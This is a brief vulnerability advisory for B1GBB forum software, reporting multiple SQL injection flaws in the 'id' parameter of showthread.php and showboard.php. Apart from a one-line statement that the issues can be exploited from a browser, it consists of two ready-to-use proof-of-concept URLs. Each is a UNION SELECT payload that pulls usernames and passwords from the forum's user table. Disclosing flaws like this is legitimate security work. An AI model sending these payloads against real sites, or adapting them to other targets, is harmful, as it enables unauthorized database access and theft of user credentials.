B1GBB ID Parameter Multiple SQL Injection Vulnerabilities

B1GBB ID Parameter Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
http://www.example.com/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*